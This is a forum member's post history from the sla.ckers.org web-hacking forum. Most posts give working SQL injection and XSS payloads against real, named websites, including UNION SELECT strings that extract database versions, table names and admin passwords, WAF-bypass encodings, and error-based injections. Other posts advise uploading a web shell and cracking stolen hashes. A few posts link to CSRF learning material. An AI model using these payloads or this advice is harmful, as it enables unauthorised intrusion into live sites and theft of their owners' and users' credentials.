sla.ckers.org is ha.ckers sla.cking
Q and A for any cross-site scripting information. Feel free to ask away.

Page 1 of 2, results 1 - 30 of 38
4 months ago
hack2012
repeat post? onerror=alert(1);
Forum: XSS Info
4 months ago
hack2012
maybe you can onclick=alert(1);
Forum: XSS Info
4 months ago
hack2012
sorry, you can't....
Forum: XSS Info
4 months ago
hack2012
thanks a lot!
Forum: XSS Info
4 months ago
hack2012
where is the URL???
Forum: SQL and Code Injection
7 months ago
hack2012
http://www.loytee.com/productDetail.php?ProductId={44439D22-59FB-15FC-692C-DE45EAE180EC}' UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16%23
Forum: SQL and Code Injection
7 months ago
hack2012
you can use URL encoding to bypass it: http://www.livsupplies.co.uk/product_list.php?id=11 UNION SELECT 1,2,%61dmin_firstname,4,5,%61dmin_password,7+from+admin-- For more details, please visit: http://www.waitalone.cn/waf-bypass-the-url-encoding-method.html
Forum: SQL and Code Injection
7 months ago
hack2012
Yes, it is. http://www.wowsoc.org/devzone/?assigned=%3Cscript%3Ealert%28/xss/%29%3C/script%3E
Forum: CSRF and Session Info
7 months ago
hack2012
http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*/ SELECT 1,2,@@version,4,5,6 5.5.28-29.1 http://pardumansinghjewellers.com/product_detail.php?id=29 and 0/*!12345UNION*//*!12345SELECT*/ 1,2,table_name,4,5,6 from /*!12345information_schema.tables*/ where table_schema=database() limit 0,1 change 0,1 to 1,1 then you will find the diff
Forum: SQL and Code Injection
7 months ago
hack2012
http://www.dkprintworld.com/product-detail.php?pid=-1280857046 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,/*!12345concat*/(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,version(),46,47,48,49,50,51,52,53,54,55,56+from /*!50000information_schema*/.tables where table_schema=database() Just use the "concat" function.
Forum: SQL and Code Injection
10 months ago
hack2012
where is the URL?
Forum: CSRF and Session Info
11 months ago
hack2012
maybe it's not allowed to execute PHP in this folder... upload the shell to another folder
Forum: SQL and Code Injection
11 months ago
hack2012
MySQL encode... http://www.cmd5.com/
Forum: SQL and Code Injection
11 months ago
hack2012
if you found it, and the root user does not deny your IP, you can connect to it with a SQL client.
Forum: SQL and Code Injection
12 months ago
hack2012
login=nop") union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28;#&pass=nop user = c1bc_cp_dba@localhost it's not root; there is no file_priv to load_file or into outfile... so you must get the username and password from the admin table.
Forum: SQL and Code Injection
1 year ago
hack2012
Is the OP from China?
Forum: SQL and Code Injection
1 year ago
hack2012
http://www.aristocars.com.pk/Car.php?id=-250 /*!12346UnioN*/ all select 1,2,@@version
Forum: SQL and Code Injection
1 year ago
hack2012
http://sellbyowners.com.pk/property_view.php?cityid=66&city=Haripur&id=123' or+1+group+by+concat_ws(0x7e,@@version,floor(rand(0)*2))+having+min(0)+or+1%23
Forum: SQL and Code Injection
1 year ago
hack2012
thanks
Forum: Obfuscation
1 year ago
hack2012
Thanks, it's very useful for me!
Forum: Obfuscation
1 year ago
hack2012
Please read it again... if you want to test CSRF, you must know how the web server adds a user or performs the other operation, then you can make a web form ****** and so on. Maybe DVWA can help you!
Forum: CSRF and Session Info
1 year ago
hack2012
Good idea, thanks... anybody who wants to read more about CSRF: http://seclab.stanford.edu/websec/csrf/ Chinese version: http://www.waitalone.cn/csrf-cross-site-request-forgery-defense.html
Forum: CSRF and Session Info
1 year ago
hack2012
and extractvalue(1, concat(0x7e, (select @@version),0x7e)) and extractvalue(1, concat(0x7e, (select user()),0x7e))
Forum: SQL and Code Injection
1 year ago
hack2012
I am sorry... https://www.rumo.com.br/sistema/adm/CodigoFonte.asp?path=/&arq=aux
Forum: SQL and Code Injection
1 year ago
hack2012
http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' UNION SELECT 1,2,3,4,5,6,7,version(),9,10,11,12--+ 5.5.17 http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELECT 1,2,3,4,5,6,7,database(),9,10,11,12--+ redc http://redc.lums.edu.pk/enrollment.php?section_id=10&pcid=53.0' and (select 1)=(select 0xA)+UNION SELEC
Forum: SQL and Code Injection
1 year ago
hack2012
on table users
Forum: SQL and Code Injection
1 year ago
hack2012
I want to try, can you send it to me???
Forum: SQL and Code Injection
1 year ago
hack2012
maybe you can try: -7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,user_id,4,5,6,7,8,9+from+user-- or -7 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!user_id*/,4,5,6,7,8,9+from+user--
Forum: SQL and Code Injection
1 year ago
hack2012
id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!%0Agroup_concat*/(/*!%0Atable_name*/),4,5,6,7,8,9 from /*!%0Ainformation_schema*/./*!%0Atables*/ where /*!%0Atable_schema*/=/*!%0Adatabase()*/-- maybe ok, or you can give me the URL.....
Forum: SQL and Code Injection
1 year ago
hack2012
http://www.cobra.com.dz/produits_cat_detail.php?id=-325 /*!%0aUNION*/ /*!%0aSELECT*/ 1,2,3,version(),5--
Forum: SQL and Code Injection